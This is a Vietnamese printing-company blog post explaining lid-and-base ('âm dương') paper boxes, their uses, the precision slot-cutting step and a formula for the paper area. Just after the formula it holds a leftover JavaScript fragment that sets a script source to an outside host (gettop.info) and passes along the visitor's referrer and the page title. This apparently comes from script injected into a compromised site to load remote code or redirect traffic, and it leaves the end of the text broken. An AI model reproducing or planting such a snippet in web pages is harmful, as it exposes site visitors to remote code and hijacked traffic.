In ấn - thiết kế

Tìm hiểu về công nghệ sản xuất hộp giấy âm dương

Tìm hiểu về công nghệ sản xuất hộp giấy âm dương

Tìm hiểu về công nghệ sản xuất hộp giấy âm dương

Đánh giá in sản phẩm

Có thể chúng ta đã quen thuộc với những cụm từ sản xuất túi giấy, in hộp giấy nhưng công nghệ sản xuất hộp giấy âm dương thì có lẽ chỉ ai trong ngành mới biết đến. Mặc dù có rất nhiều sản phẩm bao bì giấy như túi giấy handmade, túi giấy đựng quà, mỹ phẩm,… sử dụng hình thức sản xuất này. Vậy, bạn có muốn biết công nghệ sản xuất hộp giấy âm dương là gì và quy cách hoạt động của nó như thế nào không? Hãy cùng chúng tôi khám phá nhé!

Hộp giấy âm dương là gì? Đặc điểm của chúng

Hộp giấy âm dương chỉ là một thuật ngữ trong ngành để chỉ cho những loại bao bì giấy mà trong đó, chúng được chia thành hai phần riêng biệt là phần đáy và nắp. Cụ thể:
Phần âm: là phần đáy của thùng carton.
Phần dương: phần nắp bao phủ bên ngoài.
Thùng giấy carton âm dương thường có diện tích lớn nhưng hạn chế về chiều cao.

Hộp giấy âm dương

Chức năng của hộp giấy âm dương

Đựng và đóng gói các sản phẩm có kích thước diện tích rộng nhưng tiết kiệm về chiều cao như gương, mặt bàn, tranh gỗ,…
In ấn đẹp mắt để quảng cáo cho doanh nghiệp.

Quá trình sản xuất loại hộp giấy âm dương diễn ra trong một quy trình khép kín và nhất thiết phải sử dụng các loại thiết bị máy móc hiện đại, đảm bảo quy chuẩn đã đưa ra nhằm tạo nên chất lượng cũng như thẩm mỹ. Công nghệ sản xuất hộp giấy âm dương không có nhiều điểm khác biệt với các mặt hàng khác. Song, có một điều đáng lưu ý đối với việc sản xuất hộp giấy âm dương chính là khâu cắt khe của hai phần âm và dương phải có sự chênh nhau tại một điểm nhất định. Kỹ thuật này phải thực hiện cực kỳ chính xác để quá trình đóng gói về sau cho sản phẩm sẽ được dễ dàng, đồng thời tạo nên độ chắc chắn hơn trong quá trình vận chuyển.

Cách tính diện tích hộp giấy âm dương

S = ( (D+Cx2+0,03) x (R+Cx2+0,03) ) x 2     (m2)

Trong đó:       
D  – Chiều dài.
R – Chiều rộng.
C- Chiều cao.
Còn 0,03m – là phần giấy lề phải cắt bỏ.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; } else {

Posted in: Thông tin in ấn

Leave a Comment (0) ↓